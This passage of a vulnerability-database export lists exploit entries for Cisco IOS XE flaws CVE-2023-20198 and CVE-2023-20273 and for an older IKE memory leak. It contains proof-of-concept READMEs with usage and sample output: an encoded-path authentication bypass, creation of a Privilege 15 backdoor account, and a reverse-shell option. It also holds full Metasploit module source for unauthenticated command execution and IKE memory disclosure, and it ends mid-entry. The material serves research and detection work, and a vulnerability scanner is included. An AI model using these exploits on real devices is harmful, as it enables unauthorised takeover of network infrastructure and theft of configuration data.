research](https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/)<br>\n[horizon3ai CVE-2023-20198 PoC](https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/)<br>\n[nuclei CVE-2023-20198 template](https://cloud.projectdiscovery.io/public/CVE-2023-20198) (Authors: iamnoooob, rootxharsh, pdresearch)<br>\n[LeakIX CVE-2023-20273 PoC](https://blog.leakix.net/2023/10/cisco-root-privesc/)<br>\n\n## TODO\n- [ ] https support\n- [ ] CVE-2023-20273 Implementation\n- [ ] Timeout and error handling\n\n## Disclaimer\nThe code contained in this project is intended only for research and usage on systems where the user has explicit authorization.<br>\nThe author of this project is not responsible or liable for misuse of the software.<br>\nUse responsibly and don't be evil\n\n",
"modified": "2024-09-12T06:33:33",
"id": "943D5962-14B3-5410-8106-BD5EEA778153",
"published": "2023-11-16T16:39:38",
"href": "https://github.com/smokeintheshell/CVE-2023-20198",
"type": "githubexploit",
"title": "Exploit for Unprotected Alternate Channel in Cisco Ios Xe",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"vhref": "https://vulners.com/githubexploit/943D5962-14B3-5410-8106-BD5EEA778153"
},
{
"lastseen": "2024-08-28T00:16:11",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20273",
"CVE-2023-20198"
],
"description": "# CVE-2023-20198\nExploit PoC for CVE-2023-20198\n\n## Description\nCVE-2023-20198 is characterized by improper path validation to bypass Nginx filtering to reach the `webui_wsma_http` web endpoint without requiring authentication.<br>\nBy bypassing authentication to the endpoint, an attacker can execute arbitrary Cisco IOS commands or issue configuration changes with Privilege 15 privileges.<br>\nCisco's investigation into active exploitation of the previously undisclosed vulnerability revealed threat actors first exploited CVE-2023-20198 to add a new user with Privilege level 15. Further attacks involved exploitation of CVE-2023-20273 to escalate to the underlying Linux OS `root` user to facilitate implantation.<br> \n\nThis PoC exploits CVE-2023-20198 to leverage two different XML SOAP endpoints:<br>\nThe vulnerability check, config, and command execution options all target the `cisco:wsma-exec` SOAP endpoint to insert commands into the `execCLI` element tag.<br>\nThe add user option targets the `cisco:wsma-config` SOAP endpoint to issue a configuration change and add the Privilege 15 account. This endpoint could be [ab]used to make other configuration changes, but thats outside the scope of this PoC.<br>\n\nAbuse of the `cisco:wsma-exec` SOAP endpoint came from the nuclei template<br>\nAbuse of the `cisco:wsma-config` SOAP endpoint came from the horizon3ai PoC<br>\n\nNote: I did not conduct any of the original research or PoC development for this CVE. See the references section for credit.\n\n## Usage\n```\nusage: exploit.py [-h] (-t targetIP | -l targetFile) [-https] (-c | -g | -e command | -a | -d) [-u newUserName] [-p newUserPass] [-o outputFile] [-v]\n\nCVE-2023-20198 Exploit PoC\n\noptions:\n -h, --help show this help message and exit\n -t targetIP Target IP Address\n -l targetFile File containing IP Addresses (-c only)\n -https Use https\n -c [X] Check for vulnerability\n -g [X] Get Cisco IOS running config\n -e command [X] Execute Cisco IOS command\n -a [X] Add new priv 15 user\n -d [X] Remove priv 15 user\n -u newUserName [Optional] user name for -a or -d. Default: shellsmoke\n -p newUserPass [Optional] new user pass for -a. Default: pwned\n -o outputFile Write output to file\n -v Increase verbosity\n```\n\n### Vulnerability check\nTo check for CVE-2023-20198, `-c` will attempt to exploit the vulnerability to execute `uname -a`<br>\nExample:\n```\n# ./exploit.py -t 10.0.0.1 -c\n\nTesting for vulnerability\nTarget IP: 10.0.0.1\nTarget URL: http://10.0.0.1/%2577eb%2575i_%2577sma_Http\nVulnerable: True\nIOS Ver: <REDACTED> IOS 16.6 Cisco IOS Software [Everest], Catalyst L3 Switch Software (CAT3K_CAA-UNIVERSALK9-M), Version 16.6.5, RELEASE SOFTWARE (fc3)\n```\n\n### Get Cisco Config\nThe `-g` option executes `sh run` to pull the running config<br>\nExample:\n```\n# ./exploit.py -t 10.0.0.1 -g\n\nBuilding configuration...\nCurrent configuration : 6988 bytes\n!\n...\n!\nversion 16.6\nno service pad\nservice timestamps debug datetime msec\nservice timestamps log datetime msec\n...\n```\n\n### Execute commands\nArbitrary Cisco IOS commands can be executed with the `-e` option.<br>\nExtreme caution should be used when using this to make configuration changes. There is no input validation and changes are applied immediately to the running config.<br>\nExample:\n```\n# ./exploit.py -t 10.0.0.1 -e 'sh log'\n\nSelected Target: 10.0.0.1\nRunning in Exec Mode\nExecuting Command: sh log\n\nSending exploit to target URL: http://10.0.0.1/%2577eb%2575i_%2577sma_Http\n\nSyslog logging: enabled (0 messages dropped, 1 messages rate-limited, 0 flushes, 0 overruns, xml disabled, filtering disabled)\nNo Active Message Discriminator.\nNo Inactive Message Discriminator.\n Console logging: level debugging, 5368 messages logged, xml disabled,\n filtering disabled\n...\n```\n\n### Add user\nThe `-a` option can be used to create a new Privilege 15 user account, optionally specifying the account name and password with `-u` and `-p` respectively.<br>\nExample:\n```\n# ./exploit.py -t 10.0.0.1 -a -u shellsmoke -p pwned\n\nSelected Target: 10.0.0.1\nAdding New Privilege 15 User\nNew User Name: shellsmoke\nNew User Pass: pwned\n\nSending exploit to target URL: http://10.0.0.1/%2577eb%2575i_%2577sma_Http\n\nNo reportable output from adding users\nCheck verbose ouput or get running config\nDone.\n```\n\n### Del user\nThe `-d` option can be used to remove a user account from the device, and respects the username specified with `-u`.<br>\nCaution should be used to make sure you aren't deleting a legitimate account.<br>\nThis was added for instances where shell/webui access to an exploited Cisco can not be obtained. It was observed that adding a Privilege 15 user does not grant webui access and could lead to leaving exploitation artifacts on hosts.<br>\n\n## References\n[Cisco Advisory](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z)<br>\n[horizon3ai CVE-2023-20198 research](https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/)<br>\n[horizon3ai CVE-2023-20198 PoC](https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/)<br>\n",
"modified": "2024-08-26T08:31:22",
"id": "1C5F3D5A-F5D6-5471-967F-FD50D6649359",
"published": "2024-08-26T08:16:28",
"href": "https://github.com/sanan2004/CVE-2023-20198",
"type": "githubexploit",
"title": "Exploit for Unprotected Alternate Channel in Cisco Ios Xe",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"vhref": "https://vulners.com/githubexploit/1C5F3D5A-F5D6-5471-967F-FD50D6649359"
},
{
"lastseen": "2024-08-29T17:42:53",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20198"
],
"description": "# Cisco-IOS-EX-Scanner (CVE-2023-20198)\nCVE-2023-20198 & 0Day Implant Scanner (tested in a lab and works, YMMV)\n\nQuick and dirty scanner to run checks if the host is vulnerable/been compromised using 0day in Cisco IOS XE. This tool is designed to scan a given target or a list of targets to determine potential vulnerabilities based on specific checks.\n\n## Reqs\n```\npip install requests\n```\n## Usage\nYou can use the XE Implant Scanner in two modes: Single target mode and multiple targets mode (using an input file).\n\n### Single Target Mode:\n\n```\npython XEImplantScanner.py --rhost [TARGET_IP_OR_DOMAIN] [--rport PORT_NUMBER] [--ssl]\n```\n#### Arguments:\n\n- --rhost : The IP address or domain name of the target.\n- --rport : The port number to scan (default is 80).\n- --ssl : Use this flag to enable SSL.\n\n### Multiple Targets Mode (Using an Input File):\n\n```\npython XEImplantScanner.py --input_file [FILE_NAME] [--rport PORT_NUMBER] [--ssl]\n```\n\n#### Arguments:\n\n- --input_file : A file containing a list of IP addresses or domain names to scan, one per line.\n- --rport : The port number to scan (default is 80).\n- --ssl : Use this flag to enable SSL.\n",
"modified": "2024-08-22T13:08:12",
"id": "BD95D173-6A21-51A9-837D-51BCE64F5340",
"published": "2023-10-17T22:41:14",
"href": "https://github.com/ZephrFish/Cisco-IOS-XE-Scanner",
"type": "githubexploit",
"title": "Exploit for Unprotected Alternate Channel in Cisco Ios Xe",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"vhref": "https://vulners.com/githubexploit/BD95D173-6A21-51A9-837D-51BCE64F5340"
},
{
"lastseen": "2024-08-23T13:18:36",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20198"
],
"description": "# Cisco-IOS-EX-Scanner (CVE-2023-20198)\nCVE-2023-20198 & 0Day Implant Scanner (tested in a lab and works, YMMV)\n\nQuick and dirty scanner to run checks if the host is vulnerable/been compromised using 0day in Cisco IOS XE. This tool is designed to scan a given target or a list of targets to determine potential vulnerabilities based on specific checks.\n\n## Reqs\n```\npip install requests\n```\n## Usage\nYou can use the XE Implant Scanner in two modes: Single target mode and multiple targets mode (using an input file).\n\n### Single Target Mode:\n\n```\npython XEImplantScanner.py --rhost [TARGET_IP_OR_DOMAIN] [--rport PORT_NUMBER] [--ssl]\n```\n#### Arguments:\n\n- --rhost : The IP address or domain name of the target.\n- --rport : The port number to scan (default is 80).\n- --ssl : Use this flag to enable SSL.\n\n### Multiple Targets Mode (Using an Input File):\n\n```\npython XEImplantScanner.py --input_file [FILE_NAME] [--rport PORT_NUMBER] [--ssl]\n```\n\n#### Arguments:\n\n- --input_file : A file containing a list of IP addresses or domain names to scan, one per line.\n- --rport : The port number to scan (default is 80).\n- --ssl : Use this flag to enable SSL.\n",
"modified": "2024-08-22T13:08:12",
"id": "5770078F-F5C7-5063-98C6-7C111F447FB3",
"published": "2023-10-17T22:41:14",
"href": "https://github.com/ZephrFish/CVE-2023-20198-Checker",
"type": "githubexploit",
"title": "Exploit for Unprotected Alternate Channel in Cisco Ios Xe",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"vhref": "https://vulners.com/githubexploit/5770078F-F5C7-5063-98C6-7C111F447FB3"
},
{
"lastseen": "2024-08-13T16:25:12",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20273"
],
"description": "# CVE-2023-20273\nCVE-2023-20273 Exploit PoC\n\n## Usage\n```\nusage: exploit.py [-h] -t URL -u Username -p Password (-c Command | -r) [-dest Outfile] [-www | -tcp | -null] [-ip LocalIP] [-port LocalPort] [-fs filesystem] [-path filepath] [-operation operation_type] [-v] [-q]\n\nCVE-2023-20273 Exploit PoC\n\noptions:\n -h, --help show this help message and exit\n\nTarget options:\n [Mandatory] Target arguments\n\n -t URL, --url URL Target Cisco URL (eg https://192.168.1.1 or http://192.168.2.2:8080)\n -u Username, --user Username Cisco webui user name\n -p Password, --pass Password Cisco webui user pass\n\nExploit mode:\n [Mandatory] Exec command or reverse shell\n\n -c Command Command to run\n -r Reverse shell (requires -ip and -port)\n\nOutput Options:\n [Optional] Command output options\n\n -dest Outfile [-r | -www | -tcp] destination file (default: random)\n -www [Default] Attempt to retrieve output via target web server\n -tcp [Not implemented] Attempt to send output to a TCP listener (requires -ip and -port)\n -null Do not attempt to get command output\n\nCallback Options:\n For reverse shell or command output\n\n -ip LocalIP Local IP for reverse shell/command output\n -port LocalPort Local port for reverse shell/command output\n\nExploit options:\n [Not implemented] Exploit modifiers\n\n -fs filesystem Filesystem on target for exploit staging (default: flash)\n -path filepath Filepath on target filesystem for exploit staging (default: shellsmoke)\n -operation operation_type Install operation type (not currently implemented) (default: SMU)\n\nVerbosity control:\n -v Verbose output\n -q Suppress Banner\n```\n",
"modified": "2024-08-12T20:33:05",
"id": "80EF6EF3-C7F8-5300-8CD6-0F3CC33A3011",
"published": "2023-12-09T07:25:43",
"href": "https://github.com/smokeintheshell/CVE-2023-20273",
"type": "githubexploit",
"title": "Exploit for OS Command Injection in Cisco Ios Xe",
"cvss": {
"score": 7.2,
"severity": "HIGH",
"vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"vhref": "https://vulners.com/githubexploit/80EF6EF3-C7F8-5300-8CD6-0F3CC33A3011"
},
{
"lastseen": "2024-08-13T16:45:43",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20198"
],
"description": "# CVE-2023-20198 - PoC SCRIPT /!\\\n\n> **Disclaimer:** This script is provided 'as is' and exclusively for educational purposes. Users are strongly advised to exercise caution and utilize it within the boundaries of legal and ethical considerations.\n\n## Description\nExecute various actions on a target web server, such as creating and/or deleting a local user account, restarting the web server, installing and checking for the presence of the implant, and concluding by cleaning up the created user account.\n\n## Requirements\n- Python 3.x\n- Requests library (`pip install requests`)\n\n## Usage\n```bash \npython CVE_CISCO_20198_V2.py\n```\n\n## About\n[![made-with-python](https://img.shields.io/badge/Made%20with-Python-blue.svg)](https://www.python.org/) \n[![Python 3.x](https://img.shields.io/badge/Python-3.x-blue.svg)](https://www.python.org/downloads/release/python-360/)\n[![License: GPL v3](https://img.shields.io/badge/License-GPLv3-blue.svg)](https://www.gnu.org/licenses/gpl-3.0)\n[![email-contact](https://img.shields.io/badge/[email protected])](mailto:[email protected]) \n",
"modified": "2024-08-12T20:32:54",
"id": "952BD0EC-74EB-5C7A-8E40-2AD40DB6C17A",
"published": "2023-10-20T23:34:12",
"href": "https://github.com/sohaibeb/CVE-2023-20198",
"type": "githubexploit",
"title": "Exploit for Unprotected Alternate Channel in Cisco Ios Xe",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"vhref": "https://vulners.com/githubexploit/952BD0EC-74EB-5C7A-8E40-2AD40DB6C17A"
},
{
"lastseen": "2024-08-31T22:48:49",
"description": "",
"published": "2024-08-31T00:00:00",
"type": "packetstorm",
"title": "Cisco IKE Information Disclosure",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2016-6415"
],
"modified": "2024-08-31T00:00:00",
"id": "PACKETSTORM:180932",
"href": "https://packetstormsecurity.com/files/180932/Cisco-IKE-Information-Disclosure.html",
"sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Auxiliary \ninclude Msf::Auxiliary::Scanner \ninclude Msf::Auxiliary::Report \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Cisco IKE Information Disclosure', \n'Description' => %q{ \nA vulnerability in Internet Key Exchange version 1 (IKEv1) packet \nprocessing code in Cisco IOS, Cisco IOS XE, and Cisco IOS XR Software \ncould allow an unauthenticated, remote attacker to retrieve memory \ncontents, which could lead to the disclosure of confidential information. \n \nThe vulnerability is due to insufficient condition checks in the part \nof the code that handles IKEv1 security negotiation requests. \nAn attacker could exploit this vulnerability by sending a crafted IKEv1 \npacket to an affected device configured to accept IKEv1 security \nnegotiation requests. A successful exploit could allow the attacker \nto retrieve memory contents, which could lead to the disclosure of \nconfidential information. \n}, \n'Author' => [ 'Nixawk' ], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2016-6415' ], \n[ 'URL', 'https://github.com/adamcaudill/EquationGroupLeak/tree/master/Firewall/TOOLS/BenignCertain/benigncertain-v1110' ], \n[ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160916-ikev1' ], \n[ 'URL', 'https://nvd.nist.gov/vuln/detail/CVE-2016-6415' ], \n[ 'URL', 'https://musalbas.com/2016/08/18/equation-group-benigncertain.html' ] \n], \n'DisclosureDate' => '2016-09-29' \n)) \n \nregister_options( \n[ \nOpt::RPORT(500), \nOptPath.new('PACKETFILE', \n[ true, 'The ISAKMP packet file', File.join(Msf::Config.data_directory, 'exploits', 'cve-2016-6415', 'sendpacket.raw') ]) \n]) \nend \n \ndef run_host(ip) \nbegin \nisakmp_pkt = File.read(datastore['PACKETFILE']) \npeer = \"#{ip}:#{datastore['RPORT']}\" \n \nudp_sock = Rex::Socket::Udp.create( \n{ \n'Context' => { 'Msf' => framework, 'MsfExploit' => self } \n} \n) \n \nadd_socket(udp_sock) \n \nudp_sock.sendto(isakmp_pkt, ip, datastore['RPORT'].to_i) \nres = udp_sock.get(3) \nreturn unless res && res.length > 36 # ISAKMP + 36 -> Notitication Data... \n \n# Convert non-printable characters to periods \nprintable_data = res.gsub(/[^[:print:]]/, '.') \n \n# Show abbreviated data \nvprint_status(\"Printable info leaked:\\n#{printable_data}\") \n \nchars = res.unpack('C*') \nlen = (chars[30].to_s(16) + chars[31].to_s(16)).hex \n \nreturn if len <= 0 \nprint_good(\"#{peer} - IKE response with leak\") \nreport_vuln({ \n:host => ip, \n:port => datastore['RPORT'], \n:proto => 'udp', \n:name => self.name, \n:refs => self.references, \n:info => \"Vulnerable to Cisco IKE Information Disclosure\" \n}) \n \n# NETWORK may return the same packet data. \nreturn if res.length < 2500 \npkt_md5 = ::Rex::Text.md5(isakmp_pkt[isakmp_pkt.length-2500, isakmp_pkt.length]) \nres_md5 = ::Rex::Text.md5(res[res.length-2500, res.length]) \n \nprint_warning(\"#{peer} - IKE response is same to payload data\") if pkt_md5 == res_md5 \nrescue \nensure \nudp_sock.close \nend \nend \nend \n`\n",
"cvss": {
"score": 7.5,
"severity": "HIGH",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"sourceHref": "https://packetstormsecurity.com/files/download/180932/cisco_ike_benigncertain.rb.txt",
"vhref": "https://vulners.com/packetstorm/PACKETSTORM:180932"
},
{
"lastseen": "2024-08-31T23:08:51",
"description": "",
"published": "2024-08-31T00:00:00",
"type": "packetstorm",
"title": "Cisco IOX XE Unauthenticated Command Line Interface (CLI) Execution",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20198"
],
"modified": "2024-08-31T00:00:00",
"id": "PACKETSTORM:180826",
"href": "https://packetstormsecurity.com/files/180826/Cisco-IOX-XE-Unauthenticated-Command-Line-Interface-CLI-Execution.html",
"sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Auxiliary \n \ninclude Msf::Exploit::Remote::HTTP::CiscoIosXe \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Cisco IOX XE unauthenticated Command Line Interface (CLI) execution', \n'Description' => %q{ \nThis module leverages CVE-2023-20198 against vulnerable instances of Cisco IOS XE devices which have the \nWeb UI exposed. An attacker can execute arbitrary CLI commands with privilege level 15. \n \nYou must specify the IOS command mode to execute a CLI command in. Valid modes are `user`, `privileged`, and \n`global`. To run a command in \"Privileged\" mode, set the `CMD` option to the command you want to run, \ne.g. `show version` and set the `MODE` to `privileged`. To run a command in \"Global Configuration\" mode, set \nthe `CMD` option to the command you want to run, e.g. `username hax0r privilege 15 password hax0r` and set \nthe `MODE` to `global`. \n \nThe vulnerable IOS XE versions are: \n16.1.1, 16.1.2, 16.1.3, 16.2.1, 16.2.2, 16.3.1, 16.3.2, 16.3.3, 16.3.1a, 16.3.4, \n16.3.5, 16.3.5b, 16.3.6, 16.3.7, 16.3.8, 16.3.9, 16.3.10, 16.3.11, 16.4.1, 16.4.2, \n16.4.3, 16.5.1, 16.5.1a, 16.5.1b, 16.5.2, 16.5.3, 16.6.1, 16.6.2, 16.6.3, 16.6.4, \n16.6.5, 16.6.4s, 16.6.4a, 16.6.5a, 16.6.6, 16.6.5b, 16.6.7, 16.6.7a, 16.6.8, 16.6.9, \n16.6.10, 16.7.1, 16.7.1a, 16.7.1b, 16.7.2, 16.7.3, 16.7.4, 16.8.1, 16.8.1a, 16.8.1b, \n16.8.1s, 16.8.1c, 16.8.1d, 16.8.2, 16.8.1e, 16.8.3, 16.9.1, 16.9.2, 16.9.1a, 16.9.1b, \n16.9.1s, 16.9.1c, 16.9.1d, 16.9.3, 16.9.2a, 16.9.2s, 16.9.3h, 16.9.4, 16.9.3s, 16.9.3a, \n16.9.4c, 16.9.5, 16.9.5f, 16.9.6, 16.9.7, 16.9.8, 16.9.8a, 16.9.8b, 16.9.8c, 16.10.1, \n16.10.1a, 16.10.1b, 16.10.1s, 16.10.1c, 16.10.1e, 16.10.1d, 16.10.2, 16.10.1f, 16.10.1g, \n16.10.3, 16.11.1, 16.11.1a, 16.11.1b, 16.11.2, 16.11.1s, 16.11.1c, 16.12.1, 16.12.1s, \n16.12.1a, 16.12.1c, 16.12.1w, 16.12.2, 16.12.1y, 16.12.2a, 16.12.3, 16.12.8, 16.12.2s, \n16.12.1x, 16.12.1t, 16.12.2t, 16.12.4, 16.12.3s, 16.12.1z, 16.12.3a, 16.12.4a, 16.12.5, \n16.12.6, 16.12.1z1, 16.12.5a, 16.12.5b, 16.12.1z2, 16.12.6a, 16.12.7, 16.12.9, 16.12.10, \n17.1.1, 17.1.1a, 17.1.1s, 17.1.2, 17.1.1t, 17.1.3, 17.2.1, 17.2.1r, 17.2.1a, 17.2.1v, \n17.2.2, 17.2.3, 17.3.1, 17.3.2, 17.3.3, 17.3.1a, 17.3.1w, 17.3.2a, 17.3.1x, 17.3.1z, \n17.3.3a, 17.3.4, 17.3.5, 17.3.4a, 17.3.6, 17.3.4b, 17.3.4c, 17.3.5a, 17.3.5b, 17.3.7, \n17.3.8, 17.4.1, 17.4.2, 17.4.1a, 17.4.1b, 17.4.1c, 17.4.2a, 17.5.1, 17.5.1a, 17.5.1b, \n17.5.1c, 17.6.1, 17.6.2, 17.6.1w, 17.6.1a, 17.6.1x, 17.6.3, 17.6.1y, 17.6.1z, 17.6.3a, \n17.6.4, 17.6.1z1, 17.6.5, 17.6.6, 17.7.1, 17.7.1a, 17.7.1b, 17.7.2, 17.10.1, 17.10.1a, \n17.10.1b, 17.8.1, 17.8.1a, 17.9.1, 17.9.1w, 17.9.2, 17.9.1a, 17.9.1x, 17.9.1y, 17.9.3, \n17.9.2a, 17.9.1x1, 17.9.3a, 17.9.4, 17.9.1y1, 17.11.1, 17.11.1a, 17.12.1, 17.12.1a, \n17.11.99SW \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'sfewer-r7', # MSF module \n], \n'References' => [ \n['CVE', '2023-20198'], \n# Vendor advisories. \n['URL', 'https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z'], \n['URL', 'https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/'], \n# Vendor list of (205) vulnerable versions. \n['URL', 'https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z/cvrf/cisco-sa-iosxe-webui-privesc-j22SaA4z_cvrf.xml'], \n# Technical details on CVE-2023-20198. \n['URL', 'https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/'], \n['URL', 'https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/'] \n], \n'DisclosureDate' => '2023-10-16', \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [], \n'SideEffects' => [IOC_IN_LOGS] \n} \n) \n) \n \nregister_options( \n[ \nOptString.new('CMD', [ true, 'The CLI command to execute.', 'show version']), \nOptString.new('MODE', [ true, \"The mode to execute the CLI command in, valid values are 'user', 'privileged', or 'global'.\", Mode::PRIVILEGED_EXEC]) \n] \n) \nend \n \ndef run \n# We convert escaped newlines into actual newlines, as the Cisco CLI will allow you to navigate from an upper mode \n# (e.g. Global) down to a lower mode (e.g. Privileged or User) via the \"exit\" command. We explicitly let a user \n# specify the mode to execute their CMD in, via the MODE option, however we must still support the user specifying \n# newlines as they may want to execute multiple commands (or manually navigate the difference modes). \ncmd = datastore['CMD'].gsub('\\\\n', \"\\n\") \nif cmd.empty? \nprint_error('Command can not be empty.') \nreturn \nend \n \nmode = Mode.to_mode(datastore['MODE'].to_s.downcase) \nif mode.nil? \nprint_error(\"Invalid mode specified, valid values are 'user', 'privileged', or 'global'\") \nreturn \nend \n \nresult = run_cli_command(cmd, mode) \nif result.nil? \nprint_error('Failed to run the command.') \nreturn \nend \n \nprint_line(result) \nend \n \nend \n`\n",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"sourceHref": "https://packetstormsecurity.com/files/download/180826/cisco_ios_xe_cli_exec_cve_2023_20198.rb.txt",
"vhref": "https://vulners.com/packetstorm/PACKETSTORM:180826"
},
{
"lastseen": "2024-09-01T00:05:24",
"description": "",
"published": "2024-08-31T00:00:00",
"type": "packetstorm",
"title": "Cisco IOX XE Unauthenticated OS Command Execution",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20198",
"CVE-2023-20273"
],
"modified": "2024-08-31T00:00:00",
"id": "PACKETSTORM:180889",
"href": "https://packetstormsecurity.com/files/180889/Cisco-IOX-XE-Unauthenticated-OS-Command-Execution.html",
"sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Auxiliary \n \ninclude Msf::Exploit::Remote::HTTP::CiscoIosXe \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Retry \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Cisco IOX XE unauthenticated OS command execution', \n'Description' => %q{ \nThis module leverages both CVE-2023-20198 and CVE-2023-20273 against vulnerable instances of Cisco IOS XE \ndevices which have the Web UI exposed. An attacker can execute arbitrary OS commands with root privileges. \n \nThis module leverages CVE-2023-20198 to create a new admin user, then authenticating as this user, \nCVE-2023-20273 is leveraged for OS command injection. The output of the command is written to a file and read \nback via the webserver. Finally the output file is deleted and the admin user is removed. \n \nThe vulnerable IOS XE versions are: \n16.1.1, 16.1.2, 16.1.3, 16.2.1, 16.2.2, 16.3.1, 16.3.2, 16.3.3, 16.3.1a, 16.3.4, \n16.3.5, 16.3.5b, 16.3.6, 16.3.7, 16.3.8, 16.3.9, 16.3.10, 16.3.11, 16.4.1, 16.4.2, \n16.4.3, 16.5.1, 16.5.1a, 16.5.1b, 16.5.2, 16.5.3, 16.6.1, 16.6.2, 16.6.3, 16.6.4, \n16.6.5, 16.6.4s, 16.6.4a, 16.6.5a, 16.6.6, 16.6.5b, 16.6.7, 16.6.7a, 16.6.8, 16.6.9, \n16.6.10, 16.7.1, 16.7.1a, 16.7.1b, 16.7.2, 16.7.3, 16.7.4, 16.8.1, 16.8.1a, 16.8.1b, \n16.8.1s, 16.8.1c, 16.8.1d, 16.8.2, 16.8.1e, 16.8.3, 16.9.1, 16.9.2, 16.9.1a, 16.9.1b, \n16.9.1s, 16.9.1c, 16.9.1d, 16.9.3, 16.9.2a, 16.9.2s, 16.9.3h, 16.9.4, 16.9.3s, 16.9.3a, \n16.9.4c, 16.9.5, 16.9.5f, 16.9.6, 16.9.7, 16.9.8, 16.9.8a, 16.9.8b, 16.9.8c, 16.10.1, \n16.10.1a, 16.10.1b, 16.10.1s, 16.10.1c, 16.10.1e, 16.10.1d, 16.10.2, 16.10.1f, 16.10.1g, \n16.10.3, 16.11.1, 16.11.1a, 16.11.1b, 16.11.2, 16.11.1s, 16.11.1c, 16.12.1, 16.12.1s, \n16.12.1a, 16.12.1c, 16.12.1w, 16.12.2, 16.12.1y, 16.12.2a, 16.12.3, 16.12.8, 16.12.2s, \n16.12.1x, 16.12.1t, 16.12.2t, 16.12.4, 16.12.3s, 16.12.1z, 16.12.3a, 16.12.4a, 16.12.5, \n16.12.6, 16.12.1z1, 16.12.5a, 16.12.5b, 16.12.1z2, 16.12.6a, 16.12.7, 16.12.9, 16.12.10, \n17.1.1, 17.1.1a, 17.1.1s, 17.1.2, 17.1.1t, 17.1.3, 17.2.1, 17.2.1r, 17.2.1a, 17.2.1v, \n17.2.2, 17.2.3, 17.3.1, 17.3.2, 17.3.3, 17.3.1a, 17.3.1w, 17.3.2a, 17.3.1x, 17.3.1z, \n17.3.3a, 17.3.4, 17.3.5, 17.3.4a, 17.3.6, 17.3.4b, 17.3.4c, 17.3.5a, 17.3.5b, 17.3.7, \n17.3.8, 17.4.1, 17.4.2, 17.4.1a, 17.4.1b, 17.4.1c, 17.4.2a, 17.5.1, 17.5.1a, 17.5.1b, \n17.5.1c, 17.6.1, 17.6.2, 17.6.1w, 17.6.1a, 17.6.1x, 17.6.3, 17.6.1y, 17.6.1z, 17.6.3a, \n17.6.4, 17.6.1z1, 17.6.5, 17.6.6, 17.7.1, 17.7.1a, 17.7.1b, 17.7.2, 17.10.1, 17.10.1a, \n17.10.1b, 17.8.1, 17.8.1a, 17.9.1, 17.9.1w, 17.9.2, 17.9.1a, 17.9.1x, 17.9.1y, 17.9.3, \n17.9.2a, 17.9.1x1, 17.9.3a, 17.9.4, 17.9.1y1, 17.11.1, 17.11.1a, 17.12.1, 17.12.1a, \n17.11.99SW \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'sfewer-r7', # MSF module \n], \n'References' => [ \n['CVE', '2023-20198'], \n['CVE', '2023-20273'], \n# Vendor advisories. \n['URL', 'https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z'], \n['URL', 'https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/'], \n# Vendor list of (205) vulnerable versions. \n['URL', 